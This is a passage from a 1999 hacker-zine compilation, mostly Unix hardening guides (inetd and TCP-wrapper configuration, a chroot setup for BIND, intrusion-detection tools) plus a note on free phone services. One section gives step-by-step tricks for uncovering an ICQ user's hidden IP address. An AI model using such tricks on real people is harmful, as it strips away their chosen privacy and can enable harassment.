# Start the SYSLOGD/Klogd daemons. These must come first.
if [ -f ${NET}/syslogd ]; then
echo -n " syslogd"
${NET}/syslogd & # Backgrounded to avoid an ugly notice from bash-2.0
echo -n " klogd"
${NET}/klogd
fi
...
# Start the INET SuperServer
if [ -f ${NET}/inetd ]; then
echo -n " inetd"
${NET}/inetd
else
echo "no INETD found. INET cancelled!"
exit 1
fi
....

However, most services run through inetd. inetd is a daemon or background
process that starts up near the beginning of the boot sequence in Linux.
inetd listens on many ports, and when a connection to a port is requested,
it starts up the process associated with that port.

Examples of services run from inetd are ftp, telnet, finger, pop, imap,
and mail/smtp. inetd is like a switch-board operator who receives calls at
the main number of an organization (the IP address of the machine), and then
connects the caller to the extension they have requested (the port or socket).

There are two files that configure inetd: /etc/services and /etc/inetd.conf
(which may be in /etc/inet/inetd.conf). Below is an example of /etc/inetd.conf

# See "man 8 inetd" for more information.
#
# <service_name <sock_type <server_path
#
# The last 3 services ( pop3, imap, uucp) are really only used for
# debugging purposes, so we comment them out since they can
# otherwise be used for some nasty denial-of-service attacks.
# If you need them, uncomment them.
#
# ftp and telnet are the standard services.
#
ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -l -i -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
# installed the Pine package, you may wish to switch to ipop3d by
# commenting out the pop3 line above, and uncommenting the pop3 line below.
#pop3 stream tcp nowait root /usr/sbin/tcpd ipop3d
# imap2 stream tcp nowait root /usr/sbin/tcpd imapd
#
# The Internet UUCP service.
#
# uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico
-l
....

Configuring Network Services

To configure the stand-alone services, edit /etc/rc.inet2. Disable a service by commenting out
the lines related to that service. A line is commented out by placing a # before it. Here is an example
of a commented out service:

# Start the ROUTEd server.
# if [ -f ${NET}/routed ]; then
# echo -n " routed"
# ${NET}/routed -g -s
# fi

To configure the inetd services, edit /etc/services and /etc/inetd.conf. The
/etc/services file associates services with their ports. It lists the name of the service, the port
number for that service, and the protocol (udp or tcp). Here is the line for the ftp service:

ftp 21/tcp

/etc/inetd.conf contains parameters that determine how the services runs.
Here is an example of the line for the ftp server:

ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -l -i -a

To disable the ftp program, comment it out by putting a # at the beginning of the line. To activate the
change, reload inetd. This is done by finding the process-id (PID) of inetd, and then sending it the
hangup signal known as SIGHUP or just HUP.

{find out the PID}
$ ps -aux | grep inetd
root 479 0.0 0.2 1944 1520 ? S Mar 02 1:18 /usr/sbin/inetd
{ ^ this is the PID}
$ kill -HUP 479

The file /etc/services will most likely only need to be edited when adding new services. This
might be necessary when installing network utilities.

Note that we use tcpd to control access to the ftp daemon. The tcpd program is a wrapper
program that can be set up to monitor incoming requests for telnet, finger, ftp and other
Internet services. It works as follows: whenever a request for service arrives, the inetd daemon runs
tcpd, which logs the request and does some checking. When all is well, tcpd runs the appropriate
server program and goes away. For details, see the tcpd manual page. Access control for tcpd is
configured using the /etc/hosts.allow and /etc/hosts.deny files. tcpd looks at hosts.allow
then hosts.deny. It stops at the first match. Consequently, one can permit a few machines to have
ftp or telnet access and then deny access to everybody else in hosts.deny. Here is a sample
/etc/hosts.allow:

ALL: 10.100.10.0/255.255.255.0

The ALL refers to all wrapped inetd services. This does not include stand-alone services. The second
field 10.100.10.0/255.255.255.0 means all machines on the 10.100.10.0 subnet have access to
all the services. Now we want to disallow access for everybody else. Put the following line into
/etc/hosts.deny:

ALL: ALL

The non-existence of the /etc/hosts.* files or empty /etc/hosts.* means no restriction. This is an
insecure configuration unless legitimate connections might come from many diverse networks.

Security: An Overview

People often ask, "How secure is my machine?" The answer is that any publicly accessible machine is
necessarily insecure and vulnerable to security problems. Hence, we should take proper steps to
minimize the vulnerability. There are three different aspects of security: physical, system, and network.

Physical security is the first layer of security. Home users probably need not worry about this too
much. However, in a public environment, this aspect of security is a much larger concern. Keep in
mind that re-booting the system is only a ctl-alt-del away if users have access to the console. If users
can reboot the system, it is trivial to manipulate the data on the system. Whenever possible limit user
access to the console.

System Security is a topic all by itself and addresses issues such as restricting user accounts to the
minimal necessary privileges. For example do users really need a full shell environment or will a
restricted menu system do? System security also involves choosing secure, hard-to-guess passwords;
reading CERT bulletins and applying patches when necessary; and not allowing root to log in from
any terminal except the console. This means the file /etc/securetty should have only one line in it:

console

System administrators have to log in as themselves first, then run su. For increased accountability, this
program logs the user name of those who became root.

Network security is the most vulnerable part of your system. The following recommendations will
significantly improve network security:

Strip down the OS
In standard Linux installations such as Slackware, Debian or Red Hat, many network services
are enabled by default. This may be a good thing if when setting up a server, but when
configuring a user's workstation, many of these services have no benefit, and may pose serious
security concerns. Disabling these services is a good idea. In fact, the rule that most users
should follow is that any services you do not intend to use should be disabled.

Under Linux, system processes are started at boot time by adding and removing files in
/etc/rc.d. For example, sendmail is started from the file rc.M. To disable such a
service, you comment out the corresponding lines. In some Linux distributions, these
services are in /etc/rc.d/rcN.d, where N is a number (the system run level). Disable
services by deleting or renaming the files in the /etc/rc.d/rcN.d directory. Other
candidates are named, routed, and httpd.

Disable unnecessary inetd network services
Disable unneeded inetd services, in the manner described above (inetd.conf). Many inetd
services are not necessary. Comment out any that are not needed. Good candidates are: nntp
(news), finger, uucp, the ``r-commands'' like rsh, rlogin, and rexec. Use SSH instead, see
below.

Some services to possibly leave enabled are: ftp (in.ftpd), but configure ftp not to permit
anonymous access unless absolutely necessary; telnet (in.telnetd), the user interface for
remote access; and auth (in.identd), the user identification program.

Disable unnecessary stand-alone services (/etc/rc.d/rc.inet2)
Only inetd and syslogd are essential. The rest can be commented out if not needed.

  
Use SSH as a secure replacement for rlogin, telnet and rcp
SSH uses cryptography to mutually authenticate users and hosts. It also encrypts the stream of
data for confidentiality. When SSH is used, all data sent across the network is encrypted; this
assumes that it is operating in a secure mode with the normal RSA authentication and
public-key encryption enabled. This makes it very difficult for eavesdroppers to obtain useful
data by intercepting the stream of traffic.
For more information, see http://www.cs.hut.fi/ssh/.

Use TCP-wrappers to control the access to inetd services
Define the access lists in /etc/hosts.allow and /etc/hosts.deny.

Use the latest sendmail
Keep up with the latest stable version of sendmail. Disable it completely if email services are
accessible elsewhere.

Use Tripwire as an early intrusion detection system
Tripwire maintains a checksum database of important system files. It is available via
anonymous ftp from ftp://ftp.auscert.org.au/pub/coast/COAST/Tripwire

Recent Security Incidents

The following are a few Linux security advisories that have been announced recently. You can find
more in-depth descriptions of the incidents at cert.org .

Buffer-Overflows
In some programs, boundary checking is not done for the pre-allocated buffers. When such buffers
are overflowed, the executing program (daemon or set-uid program) can be tricked into performing
various abnormal operations or functions. Generally this works by overwriting a function's return
address on the stack to point to another location, then executing either a root shell or code that might
change the protection on a program such that it can then acquire root privileges.

99-03: FTP-Buffer-Overflows
By supplying carefully designed commands to the ftp server, intruders can force the server to execute
arbitrary commands with root privilege. Any server running the latest version of ProFTPD
(1.2.0pre1) or the latest version of Wuarchive ftpd (2.4.2-academ[BETA-18]) is vulnerable.

98-12: Buffer Overflow in Some Implementations of IMAP Servers
The overflow is in library code from the University of Washington IMAP server that handles SASL
server-level authentication. Remote intruders can execute arbitrary commands under the privileges of
the process running the vulnerable IMAP server. If the vulnerable IMAP server is running as root,
remote intruders can gain root access.

Remotely Exploitable Buffer Overflow Vulnerability in mountd
On some systems, the vulnerable NFS server is enabled by default. This vulnerability can be
exploited even if the NFS server does not share any file systems. All un-updated versions of Red Hat
Linux are vulnerable.

"sscan" Scanning Tool
The sscan tool performs probes against victim hosts to identify services which may potentially be
vulnerable to exploitation. Though sscan itself does not attempt to exploit vulnerabilities, it can be
configured to automatically execute malicious scripts to exploit vulnerabilities. Watch your logs for
port scanning.

Denial of Service Attacks
There is a great increase in the number and variety of denial of service attacks in recent years. A
well-known one is the smurf attack. Basically, a large amount of ICMP echo (ping) traffic is sent to
a host or hosts, all of it having a spoofed source address of a victim. On a multi-access broadcast
network, there could be hundreds of machines replying to each packet. In the common scenario,
users with Internet access through a slow link will work hard to gain access to a high-powered
machine located on a high-speed link, install the various utilities used to attack other hosts, and then
launch the attack from this host.
For more information about the smurf attack, see http://users.quadrunner.com/chuegen/smurf.txt.

Conclusion

Because Linux supports so many avenues of networking, care should be taken to secure your Linux
server. The general rule of thumb is "Only turn on the services you need". Edit down
/etc/inetd.conf, rc.inet2 and /etc/rc.d/rcN.d. Keep up with the security patches. Use
good password policies. Most of the recent Linux distributions include 'passwd' programs that do not
allow you to set an easily guessed password. Make sure your passwd program is up to date and has
these features. Check your system's logs daily for abnormal activities like port scanning. Become
familiar with the processes that normally run on your system and check regularly for unusual
processes (beware of processes with names that might be very close to regularly running tasks). Scan
your systems for unusual or suspicious files or directories. For example, filenames that start with '.',
directories named '...', and unusual device names like '/dev/ttypx'. Use SSH instead of telnet and FTP
for more secure communication.

There are many web sites and mailing lists on UNIX Security in general and Linux security in
particular. It is important to keep current with the security issues happening around the Internet; this
might include becoming familiar with the latest tools. Here are a few useful sites:

UNIX Configuration Guidelines
ftp://info.cert.org/pub/tech_tips/UNIX_configuration_guidelines

Security Tools
ftp://info.cert.org/pub/tech_tips/security_tools

Bugtraq
http://www.mit.edu:8008/menelaus/bt/

References

1 Kevin Fenzi (kevin@scrye.com) & Dave Wreski (dave@nic.com). Linux Security HOWTO
v0.9.11, 1 May 1998.

2 Matt Welsh, Phil Hughes, David Bandel, Boris Beletsky, Sean Dreilinger, Robert Kiesling,
Evan Liebovitch, Henry Pierce. Linux Installation and Getting Started Red Hat Version
3.2, 20 Feb 1998.

3 Terry Dawson, VK2KTJ, Alessandro Rubini (maintainer),alessandro.rubini@linux.it. Linux
NET-3-HOWTO, Linux Networking. v1.3, 1 April 1998.

4 Wietse Venema TCP Wrapper: Network Monitoring, Access Control and Booby Traps.
USENIX Proceedings, UNIX Security Symposium III, September 1992.

5 Maintained by Peter Baer Galvin The Solaris Security FAQ SunWorld, URL:
http://www.sunworld.com/commom/security-faq.html, Last modified: Thursday, April 01,
1999.



Wei-Mei Shyr worked as a system administrator for the Unix Support Group at the
Department of Information Technology Services, University of Western Ontario.

Brian Borowski is a network administrator who supports a wide range of network equipment
at the University of Western Ontario.


@HWA

59.0 Cool internet phone resources
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(See also section 13.0 for making free phone calls within the US - Ed)




_|_|_| _| _| _| _| _| _| _| _|_|_| _|_|_|
_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_| _| _|_|_| _| _| _| _| _|_|_| _|_|_| _|_|
_| _| _| _| _| _| _| _| _| _| _| _| _|
_| _|_|_| _| _| _| _| _| _| _| _| _|_|_| _|_|_|


_|_|_| _| _| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _| _| _| _| _| _|
_|_|_| _|_|_| _|_| _| _|_| _|_|_|
_| _| _| _| _| _| _|
_| _| _| _|_|_| _|_|_| _|_|_| _|_|_|


http://www.pheces.org
"I sniffed Coke once but the ice got stuck in my nose."


öööööööööööööööööööööööööööööööö

Title: |||| cool phone stuff on the internet ||||

Date: September 17, 1999
Author: matt

öööööööööööööööööööööööööööööööö

Alright, this is my first text file so bare with me.

Phones.. you use em everyday, they're a part of life. You can get so nice
free phone services like voicemail, phone email, and other sweet shit,
right on the net.

Broadpoint has a nice program that offers you long distance calling for
free. You listen to (ignore) a 15 second ad and you get talk time. Its 1
ad per 2 minutes of talk time. These things are great for prank calls
from pay-phones and calling mom to come pick you up at the movies. The
offer is called FreeWay and is found at http://www.broadpoint.com

myTalk is a place that gives you an email address, and a toll-free number
with and extension. So say someone sends you an email, you can go online
and check your mail via the web, or if you're away from home, you can call
up your toll free number, enter your extension, and you can listen to some
geeky voice read you your messages. You can also send messages over the
phone, it'll encode em to a .rm or .wav file for you and send them to the
address you specify. Visit their site at http://www.mytalk.com

Ok, so you want voicemail so your friends can contact you, no problem.
uReach has a great voicemail system. You get your OWN toll free number,
thats right, no special extensions. People can call your number up and
leave you a message. You can get their message by going on their website,
logging in, and hearing it in audio format, or you can just call up your
number and hear your messages. They too also will read you your email and
you can send email from there. They also have a sweet fax service where
you just send an email to say 3132987600@fax.ureach.com and it'll send
that message to the fax machine you listed in the address, in this case
its 313-298-7600. You can hook up with uReach at http://www.ureach.com

There are tons of other free phone services around the net, you just have
to look for them. I know Excite.com has some free voice-mail system.
Thinklink.com also has something, but you have to give them your credit
card number. Look around, you'd be amazed at what you can get for free on
the internet.

matt (matt@kire.net)

(((((((((((((((((((((((((((((((((((((#yep)))))))))))))))))))))))))))))))))

@HWA

60.0 Securing DNS in FreeBSD/OpenBSD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Securing DNS (OpenBSD/FreeBSD Version)



There have been a large number of problems with BIND because of the size
and complexity of the functions it performs. As a result, a number of
attacks (and here ) are beginning to emerge that target this service
specifically, some of which can allow full remote access to the target
host. Because systems running DNS servers are so critical to the network
infrastructure, it is vital that these systems do not get compromised.

To further this, I've prepared this short document that describes how to
set up your BIND 8.1.x server in a chroot() environment under OpenBSD 2.3
, which is what I run my DNS/SMTP/WWW servers on. This document is largely
inspired by my friend Adam Shostack and his paper on the identical
subject matter (which covers Solaris). Please read his paper (and check
out his entire page which contains good reading) after you've been here.
As a side note, OpenBSD version 2.4 and above now run with BIND in a
chroot() jail by default (this document was originally written before that
release), but these instructions will prove equally useful to other BSD
variants that don't have this useful and prudent feature on by default.

NOTE: This is a living document and I expect changes and small errors to
be discovered over time. My DNS server is very small and handles a limited
number of zones and traffic. It is quite possible that the information I
supply here does not work for larger sites. If this is your case
please write me and tell me what is broken so I can change it here! Your
input will be given full credit and will help everyone who wishes to
contain the beast we call BIND.


Step One: Get The Software and Install

Go to the ISC FTP Site and download the latest version of BIND. These
directions have only been tested on BIND version 8.1.x. Higher versions
are shipping now and testing will be done on these as well, although a
preliminary glance indicates that the procedure will be virtually
identical.

Install the software per the directions included with the package.

Step Two: Make static named and named-xfer binaries

After the build and install you will need to make a statically linked
version of the program. This is easily accomplished by going into the
directory /src/port/openbsd under BIND and editing the file Makefile.set.

Change the line:

'CDEBUG= -O2 -g'

To:

'CDEBUG= -O2 -static'

Go to the top of the BIND source directory and do a "make clean" followed
by a "make". Go onto the next step where you will copy the files to the
chroot() directory.

For the uninitiated, a statically linked program is one that does not
perform dynamic loading of libraries. For a chroot() environment it means
that the executable will be "self-contained" and will not cause an error
if you are missing a library file. While it is not necessary to have
statically linked files in the chroot() environment, it often makes setup
easier. I prefer to have all network daemons statically linked for this
reason.


Step Three: Make a Directory for BIND

Create a directory for BIND to be chroot()ed in. This can be as simple as
/chroot/named and will be the "pseudo" root where BIND will reside. The
ultra-paranoid may even want to put this chroot jail on a separate
physical volume.

Under this directory you will need to create the following directory
structure:

/dev /etc /namedb /usr /libexec /var /run

Under each directory you will need to copy the following files and/or
perform the following commands:

/ copy statically linked named binary from the BIND
src/bin/named directory

/etc copy named.conf from /etc copy localtime from /etc (so
named logs correct timezone in syslog)

/etc/namedb copy all zone databases and files from /etc/namedb

/dev mknod null c 2 2; chmod 666 null (For other BSD variants,
look at /dev/MAKEDEV to get the mknod command)

/usr/libexec copy statically linked named-xfer binary from
the BIND src/bin/named-xfer directory

/var/run None

Additionally, Bernhard Weisshuhn <bkw@weisshuhn.de>, writes that if you
have custom logging directories specified that you need to be sure to make
these as well (/var/log). Although named won't crash, it will complain.

Step Four: Add named user and group

Add the user named to the /etc/passwd and to the /etc/group files. This
will be the UID/GID that the server runs under.

You should now go to the /chroot/named/var/run directory and make it
writable by named so the named.pid file can be written to upon startup.
This is used by the ndc command to control named's operation.

At this point you may want to go into your chroot named area and chown -R
named.named on the /etc/namedb directory. This allows named to dump cache
and statistical information if you send it the proper signal (kill -INT
<PID>) . This change should not significantly effect the security of
your chroot() setup. Leaving it owned as root won't allow named to write
out this information (remember named now runs under a new UID and no
longer root), but still allows named to function. A second option is to
change the permissions to allow writing to this directory, but leaving it
owned by root. This could also work but you need to be careful with doing
so to ensure normal users can't modify your named records!

IMPORTANT: ** DO NOT USE AN EXISTING UID/GID to run named under (i.e.
"nobody"). It is always a bad idea to use an existing UID/GID under a
chroot environment as it can impact the protection offered by the service.
Make a separate UID/GID for every daemon you run under chroot() as a
matter of practice.


Step Five: Edit startup scripts

1) Edit /etc/rc and change the named startup line from:

echo 'starting named'; named $named_flags

To the location of your statically linked binary under the chroot
directory:

echo 'starting named'; /chroot/named/named $named_flags

You now need to enable a syslog socket in your chroot jail so named can
write messages to your logs. To do this edit /etc/rc.conf and change the
syslogd flags:

syslogd_flags="-a /chroot/named/dev/log" (FreeBSD uses '-l' instead of
'-a')

You will also need to change the startup flags for BIND. Version 8.x has a
feature where you can change the user and group ID after binding. This is
where you specify your UID/GID you assigned to BIND above.

named_flags="-u named -g named -t /chroot/named"

2) BIND 8.1.x ships with a script called "ndc" which is used to control
named operations. You will need to edit this file and change the location
of the variable PIDFILE from /var/run/named.pid to
/chroot/named/var/run/named.pid. BIND 8.2.x and above now makes this
a binary and this change won't be necessary any longer.

Step Six: Test it out

Stop syslogd and named if they running and then from the command line type:

syslogd -a /chroot/named/dev/log (FreeBSD uses '-l' instead of '-a')

Go into this directory and ls -al. You should see (the date is insignificant):

srw-rw-rw- 1 root wheel 0 Jan 01 12:00 log

The "s" bit is set to indicate that the file is a socket. This is how
named will write to syslog from within the chroot() jail.

Now type:

/chroot/named/named -u named -g named -t /chroot/named

If all goes well named will start and your logs will indicate that named
is "Ready to answer queries."

Perform other DNS tests as appropriate to ensure operation, then reboot
your system and verify the setup. BIND should have started and reported it
chroot()ed to to directory and changed UID/GID. You can use a program such
as lsof to list out the owner of all network sockets on the host.
The owner should be your named UID/GID.

When everything is working you should either rename /etc/namedb to
something like /etc/namedb.orig and chmod 000 /usr/sbin/named to ensure
that the old version doesn't get run by mistake. Reboot your system and
assuming everything is correct your named will now be chroot()ed.


Thanks

Thanks to the following people who made suggestions and submitted
corrections:

Steinar Haug <sthaug@nethelp.no> - Comments concerning blocking of TCP to
port 53.

Bernhard Weisshuhn <bkw@weisshuhn.de> - Comments pertaining to Linux
install (typos, adding /etc/group entry).

Marc Heuse <Marc.Heuse@mail.deuba.com> - Comments pertaining to logging
and renaming of old binaries and directories.

Jan Gruber <jgr@tpnet.de> - Comments pertaining to permissions on
/chroot/named/var/run and changes to the ndc control script.

Modred <modred@antisocial.net> - Corrections for FreeBSD and small typo on
making /dev/log

Robert J. Brown <rjb@netpr.com> - Corrections in steps five and six where
I typed /chroot/named instead of /chroot/named/named to start the binary.
Advised about changes to ndc under BIND 8.2.

Other Sources


Adam Shostack's Home Page - Good reading on various items.
http://www.homeport.org/~adam


Internet Software Consortium - Suppliers of BIND, INN, and other software.
http://www.isc.orgs


All Material Copyright ©1996-99 Craig H. Rowland and Psionic Software Systems

@HWA


61.0 Getting someone's IP thru ICQ without a hacking proggie
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_|_|_| _| _| _| _| _| _| _| _|_|_| _| _|_|_|
_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_| _| _|_|_| _| _| _| _| _|_|_| _|_|_| _| _|_|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_| _|_|_| _| _| _| _| _| _| _| _| _|_|_| _|_|_| _|_|_|


_|_|_| _| _| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _| _| _| _| _| _|
_|_|_| _|_|_| _|_| _| _|_| _|_|_|
_| _| _| _| _| _| _|
_| _| _| _|_|_| _|_|_| _|_|_| _|_|_|


http://www.pheces.org presents...

Getting someones IP through ICQ without a funkay program

------------------------------------------
Author: X-Arch

Disclaimer (who gives a fuk but eh): im not responsible for anything u use this
information for...for educational perpose and all that stuff....so just chill and
use it for knowledge..=)
-----------------------------------------

What are we doin:
Ever wanted too get someones IP and the only way is through icq and they have it
hidden?...and you dont have any programs on you too do so?....well here we go...very
easy trick too get past it and see they'r ip in they'r info...



Related txts's: none that i know of

How to:

Step #1:
Connect to icq network....i.e. just load icq and connect

Step #2:
is the person who u wanna get the ip of online?...if so then simply check they'r icq
info...if it is hidden then here we go this is how you get they'r ip...


Step #3:
simple make sure they are online and then DISCONNECT YOURSELF from ICQ ONLY, i.e. goto icq
and then status and click disconnected.

Step #4:
then WHILe you are offline goto the person who you wanna get the IP of and goto they'r INFO
and then they'r LAST ip will be there. So if they are still online you will see they'r IP
and there ya go...have fun...=)


Method 2 (unstable method):

Step #1:
Connect to icq...then the person who u wanna get the IP of just send them a msg....


Step #6:
When you get a response, goto a DOS prompt and type "netstat"....then look through the generic
IP's there and look for something that is coming from a port between 1000-4000 or something
of the sort....that should be them sending a msg on that port through ICQ...enjoy...this
method is more unstable and not as reliable and more for more advanced users who know how to
use netstat properly...

well thats it for now....enjoy!




(((((((((((((((((((((((((((((((((((#yep)))))))))))))))))))))))))))))))))))))

@HWA

62.0 Intrusion detection within a secured network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Intrusion Detection within a Secured Network

This information was provided and written by OptikNerve. This text file
describes how to detect an intrusion within a secured network for the
system's administrator. The programs that are used in this text file are:
RealSecure 3.0, Centrax 2.2, and AXENT NetProwler.

Site Resources:

www.cybersafe.com - Centrax 2.2
www.axent.com - NetProwler 3.0
www.iss.net - RealSecure 3.0

Introduction to Intrusion Detection Intrusion detection methods are
pretty much based on the assumption that an intruder's activity is
noticeably different then the regular/usual behavior of a regular user.
The distinguishing characteristics characteristics of an ID include the
set of parameters they examine and the source of their data.

Host-based Intrusion detections are of two different types: application
specific and operating system-specific. In both types, an agent generally
runs on the server being monitored, and analyzes log files, access
records, and application log files. Anomaly detection module which are
based on statistical camparisons to normal patterns are typically
used on a Host-based systems. In the case of operating system-specific
monitors, abnormal sessions, such as unsuccessful logins which are
compared to a behavoiral model of normal usage using criteria, such as
time of access and the number and types of files created and accessed.
Application-specific intrusion detection tools usually define a set of
rules describing suspicious activity based on logged events. Generally,
these tools don't operate in real time and don't have access to the
protocol or other real packet-level information while searching for the
patterns of suspicious activity.

Network-based intrusion detection monitors have the benifit of potentially
analyzing all layers of the network communication. These tools can reside
on their own servers, therefore, can eliminate performance hits on the
application server(s). They can also use a rule base to describe common
attack techniques. Patterns (known as attack signitures), define the
sequence of network events that constitute an attack. Attack signatures
can be defined dynamically as user-definable patterns or statically as
functions within the application.

Deploying Intrusion Detection Since intrusion detection operate by
analyzing network traffic, the monitors provide protection only for local
segments. There are four common deployment strategies:

In the he network's DMZ (demilitarized zone)-- Acts to protect
devices in that area, such as firewalls from attack. On
each critical segment within the intranet-- Detecting intrusions here
can help protect against security breaches from within the
organization. Just inside the firewall on the intranet-- Provides a
means of monitoring a firewall and ensures that there no tunnels
through that firewall that are being used to breach the system. On
critical hosts-- Sensitive data gains some protection by having
intrusion detection agents monitor unusual administrative activities
or configuration changes.

Most attacks were carried out from within the organization, but this is
beginning to change: In various survey's, this statement would be
considered false. Right now, the number of internet attacks, are made from
internal sources.

If you're concerned interdepartmental traffic, the network backbone is
another location for an intrusion detection. Network administrators with
large modem pools may consider wanting to monitor traffic immediately
behind the modems.

RealSecure 3.0 RealSecure 3.0 is a member of Internet Security
Systems SAFEsuite package of network security software. Other applications
include Internet Scanner, a network vulnerability system that checks
TCP/IP services, Web servers, and firewalls for specific vulnerabilities
or exploits. System Scanner, an operating system-specific vulnerability
checker; and Database Scanner, a risk assessment product for Microsoft SQL
server and Sybase databases.

RealSecure supports two types of detectors: system agents and network
engines. Network engines monitor network packets on a segment looking for
attack patterns. System agents monitor activity on hosts to determine
whether an intruder has gained access to the system. RealSecure is
administered from a console application, which communicates with other
components using strong authentication.

ISS recommends running RealSecure on dedicated hosts. The detectors and
console are both memory insensive applications and shouldn't be running
together on the same machine. A 300MHz server with 128MB of RAM is
recommended for running detectors on NT 4.0. The console should have
a 200MHz with 64MB of RAM on NT 4.0. Determining the ammount of disk space
can be difficult, and will depend on the volume of traffic and the
RealSecure configuration. Security administrators need to determine which
events are worth monitoring to prevent excessive use of disk space.

The first task with RealSecure is to add detectors to your configuration
using the console. Setting up a detector will define the attack signature
to monitor, user-defined connection events, user-specified actions,
filters, e-mail notifications, and SNMP traps. The detector and consoles
communicate using strong encryption methods. Policies specifiying what
type of traffic to monitor, the priority of events, and how to detector
responds to events.

RealSecure uses three types of events: connection, security and user
defined filter. Security events use a static set of attack signatures to
recognize suspicious activity that might be comming from an intruder.
Connection events recognize connections through particular ports, from
certain addresses, or with a certain type of protocol. User-defined
filters allow the detectors to ignore particular kinds of traffic, based
on the protocol, source and the destination IP addresses, and the source
and its destination ports.

When an event is detected, an action is carried out. RealSecure supports
10 types of actions; the most important are logging summary information,
logging raw data, sending e-mail notification, killing a session, locking
the firewall, viewing a session, and running user-defined actions.
Sessions are killed by sending a TCP reset command to both parties.
Locking the firewall sends a command to the firewall to block traffic from
the offending source IP address for a specified period of time. Viewing a
session allows a security manager to monitor communications if real time.
User-provided executables carry out user-defined actions.

Centrax Centrax 2.2 is an integrated host- and network based
intrusion detection with the vulnerability assessment and policy
management features that was made by CyberSafe. Centrax consists of a
Command Console and target services. As with RealSecure, the console lets
security managers monitor and configure the intrusion detection software.
The console runs on an NT server; the target services can run on both
Solaris and NT systems. CyberSafe recommends that the Console is run on
atleast a 166MHz with 64MB of RAM. Target services can run on NT
Workstation or Server 3.51 or 4.0 with atleast a 486 processor and 32MB of
RAM.

Around 50 or more attack signatures are provided for Solaris and around 80
signatures are provided for NT. Monthly updates to the attack signature
set are avialable from the CyberSafe website. As with RealSecure,
administrators can sonfigure the responses to an event(s) and shut down
the system, log off the user, or even disable the account. The attack
signatures cover a range of objects and activities, including audit and
administrative activities, critical system objects, decoy files, password
changes, administrative groups, and user administration.

Since this includes a host-based system, there will be some performance
penalty which will be around two to five percent when optimally
configured-- unlike configured network-based systems that require a
dedicated system and monitor traffic. Another difference between network-
and host-based systems, such as Centrax, is that the latter belong
within the intranet, not on the permineter of the network.

The Centrax 2.2 Console is made up of serveral components. Target Agents
communicates with target services to distribute audit and collection
policies, along with gathering status information from the services.
Assessment Manager evaluates security vulnerabilities, such as problem
with guest accounts and administrative privileges. Alert Manager
notifies security managers of a detected intrusion/threat. Detection
Policy Editor is used to define the list of potential attacks to watch for
and means of notification. Gathering data from the target services is run
by policies defined in the Collection Policy Editor. Last, the Report
Manager provides forensic analysis and detailed reports of the current
system(s) activities.

AXENT NetProwler AXNET NetProwler is a network-based intrusion
detection tool that lets users define custom signatures. Initially
configured with more then 200 well-known attack profiles/signatures which
include: port scanning, denial of service, TCP sequence number spoofing,
and IP address spoofing. NetProwler provides a GUI tool that lets users
create attck signatures for less common types of attacks, such as attempts
to an Oracle database and more. In addition, NetProwler provides other
network management tools, which include consistency check for DNS server
tables, Web and FTP daemon content, time-of-day access restrictions, and
inactive session purging.

NetProwler, similar to RealSecure and Centrax, uses a combination of
centralized management, distributed collection and detection agents, and
data repository. The NetProwler console is a Java-based tool, that runs
from a Web browser. The centralized data repository supports Microsoft
Access and SQL daemons.

As like the other tools, administrators can configure their own systems to
monitor activity and review attack signatures from the console. The most
distinguishing characteristic that NetProwler provides is its ability to
define custom attack signatures using an attack signature wizard.

Stateful Signature Inspection (SDSI) comprises a virtual processor, an
intrusion set for defining attack signatures, and a cache for maintaining
the state of connections monitored by the processor. When a packet is
processed, the previously gathered information on the cache, and attack
signature definitions are executed on the virtual processor. When an
attack pattern is found, the actions associated with the attack are
executed. Since attack signatures are data-driven, you are allowed to add
new ones in real time. AXNET maintains an Internet Security team, which
researches new threats and vulnerabilities then they publishe attack
signatures that can be downloaded as needed.

A graphical user interface is used to configure and monitor the system,
allowing administrators to monitor both network-based and host-based
intrusion detection systems across the network. When first installed,
NetProwler analyzes traffic on the network, and examines hosts on the
segment to determine the attack profiles that should be loaded. This
assessment also includes discovery of popular systems and applications. At
any point, after the installation, an administrator can add custom attack
signatures using a drag-and-drop tool. Three types of attacks can be
defined:

1-off attack, such as a LAND attack that sets the source and
destination address of the packet the same address is done with a
single transmission. Sequential or low-level attack, in
which there's a series of exchanges between the server and the
client. counter-based attack, such as 20 queries to the same database
lookup page, can be blocked, based on the number of times a pattern
appears in the stream of network traffic.

All three types are defined by using keywords; for example, TCP Stack, and
a set of predefined expressions, such as conditional statements.

Protecting User Privacy PlanetAll, provides a Web-Based contact
management repository for its clients. Users can define address books and
link to other PlanetAll users sharing scheduling and address information.
They have a strict policy of safeguarding a user's privacy, believing that
contact information should be completely private, and its shared only when
users explicitly choose to share it. As part of the overall security plan
for protecting customer information, PlanetAll uses NetProwler.

On the downside, NetProwler, and network-based detection mechanisms in
general, don't work on switched networks since traffic isn't broadcasted
through the entire segment. To provide NetProwler with access to the
entire traffic stream, PlanetAll had to place its server outside the
sweitched network segment.

Conclusion Intrusion detection is another type of security tool that
IT managers must create to protect their information resources. Intrusion
detection complements firewalls by allowing a higher level of analsis of
traffic on a network, and by monitoring its behavior of the sessions on
the servers. Network-based detection allows access to the entire OSI
stack, but is limited on switch networks and Virtual Private Networks
because of encryption reasons. Host-based intrusion detection systems
provide a more operating specific monitoring, but can't protect against
low-level attacks such
as a denial-of-service attack. Intrusion detection vendors have known of
the limitation of these approaches and are now offering multiple programs,
such as NetProwler's host-based counterpart from AXENT, Intruder Alert,
to provide more accurate coverage and logs.



Copyright Secure System Admistrating Research, 1999 all rights reserved.


@HWA

63.0 Preparing your Linux box for the internet: Armoring Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Preparing your linux box for the Internet
Armoring Linux

Lance Spitzner
Last Modified: 23 June, 1999

Organizations throughout the world are adopting Linux as their production
